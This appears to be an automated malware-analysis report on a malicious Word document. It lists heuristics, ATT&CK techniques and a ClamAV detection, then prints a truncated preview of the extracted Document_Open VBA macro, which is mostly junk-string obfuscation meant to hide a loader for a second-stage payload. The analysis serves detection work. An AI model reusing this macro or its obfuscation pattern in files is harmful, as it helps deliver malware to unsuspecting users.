MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample contains a critical OLE_VBA_SHELL heuristic indicating the use of the Shell() function, and a critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic suggesting an obfuscated auto-exec loader. The Document_Open macro is present and likely responsible for executing the obfuscated code. The ClamAV detection 'Doc.Malware.Chronos-6897935-0' further confirms its malicious nature. The VBA code appears to be designed to download and execute a second-stage payload.
Heuristics 7
-
ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 39008 bytes |
SHA-256: bdd04a1b6b3b6e9af97749d8d1594d137daa84ccd7bb69f0b9f76d0d711e0656 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
If 2205252 = 86 - 6285 Then
VHxrv = Replace("jByMCyHzCxcuYJh", "jByM", "HedasGp")
VHxrv = StrReverse("jByMCyHzCxcuYJh")
End If
jSHQan = StrReverse("tQnedmPjxiYh")
If 1693535 = 107 - 2568 Then
VgSWG = Replace("JiIkJnfThhUdRJm", "JiIk", "SzbQUfe")
VgSWG = StrReverse("JiIkJnfThhUdRJm")
End If
DqAwSB = Replace("LFxxMZOSnTWp", "LFx", "mvWRIJt")
If 680168 = 205 - 3593 Then
RwfYF = Replace("EEbBtCSlxIs", "EEb", "XyedM")
RwfYF = StrReverse("EEbBtCSlxIs")
RnfMb = Replace("WBRSrzxoHiKmTa", "WBRS", "pdEvHT")
RnfMb = StrReverse("WBRSrzxoHiKmTa")
End If
fcshdX = Replace("ATFIucpxMT", "ATFI", "KyRm")
If 3620233 = 166 - 3787 Then
SpzAg = Replace("jhxScFSFqDPmLG", "jhxS", "aXuLgL")
SpzAg = StrReverse("jhxScFSFqDPmLG")
End If
hpeowW = Replace("xJMruOrsrYnJUUw", "xJMr", "tJKDG")
For uLiIP = 0 To 329
If 1951127 = 120 - 3990 Then
yeLYa = Replace("FtDXebhATCsaeYF", "FtDX", "XrPjzA")
yeLYa = StrReverse("FtDXebhATCsaeYF")
kOEIB = Replace("WdIbfPiwZljt", "WdI", "GvLBD")
kOEIB = StrReverse("WdIbfPiwZljt")
End If
If 2552869 = 204 - 4543 Then
goryT = Replace("JcFxLrWoeJDpf", "JcFx", "PZPMYRP")
goryT = StrReverse("JcFxLrWoeJDpf")
End If
lyPk = Replace("zusIcnQXcyPjWvzD", "zus", "ZudwmRX")
lyPk = StrReverse("QmZIunbneRHOkn")
lyPk = Replace("TxjqkODhUbURAqV", "Txjq", "sOIV")
lyPk = Replace("QUeEnhtKCUAyP", "QUeE", "HEzvbW")
lyPk = StrReverse("xkWruzZyCFBZOxOd")
lyPk = Replace("pEkYGRSBKlMEbwYQxyI", "pEk", "lJcMrE")
lyPk = StrReverse("xgMSjvPFuVdYH")
If 665004 = 10 - 2369 Then
hZYSB = Replace("xjOdeoMBufv", "xjO", "uAGFvj")
hZYSB = StrReverse("xjOdeoMBufv")
End If
lyPk = StrReverse("wgVLBxutymHoiHA")
lyPk = StrReverse("oPkzmwnEcPiyJLCkS")
lyPk = StrReverse("GSlSOFfPmWsuD")
lyPk = Replace("ciQsfyLwnWwxgwFXV", "ciQs", "BFivFE")
lyPk = StrReverse("WGXgxQCHojuaP")
lyPk = StrReverse("qRXPOBKiHyY")
If 2080466 = 20 - 1834 Then
QsFdw = Replace("gVhVEzdyWzUzJvLL", "gVhV", "uroTnkU")
QsFdw = StrReverse("gVhVEzdyWzUzJvLL")
End If
lyPk = Replace("dgZbYofvLLF", "dgZb", "VmeRgqP")
lyPk = Replace("ioPUWQQfHpHHeEYu", "ioPU", "JqEtbz")
lyPk = StrReverse("bBQOBBiZtZFycTdWRGu")
lyPk = StrReverse("IxaTgLXIpXVi")
lyPk = Replace("ohjWJywhvL", "ohj", "zxKu")
lyPk = Replace("SDZgTXfycAyqanmQlX", "SDZ", "QypXXdj")
If 382194 = 181 - 1494 Then
IqqRL = Replace("wJqylmXYudUnPqxhFq", "wJq", "LWGP")
IqqRL = StrReverse("wJqylmXYudUnPqxhFq")
PXAsI = Replace("HokXpsvPcJ", "HokX", "zUzuAED")
PXAsI = StrReverse("HokXpsvPcJ")
End If
If 2661879 = 164 - 6982 Then
VXcmm = Replace("BpLtEPahJKZrfpT", "BpLt", "CnIPWSE")
VXcmm = StrReverse("BpLtEPahJKZrfpT")
End If
Next uLiIP
For bQMIm = 0 To 292
UoXe = StrReverse("GFrEmZkqtI")
UoXe = Replace("AkKpjsAZcSE", "AkK", "VDzv")
UoXe = StrReverse("ImczyFHuxprq")
UoXe = StrReverse("YWXMRpcCDITfctXE")
UoXe = StrReverse("ZzlchwbdjueHMom")
UoXe = StrReverse("hGaALIyeDYqyf")
UoXe = StrReverse("sGZMRRyidtWItSzP")
UoXe = StrReverse("GwcCqUTCaRnGsRCZ")
UoXe = Replace("zMXBbPbgSUTZ", "zMXB", "tuhfReh")
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.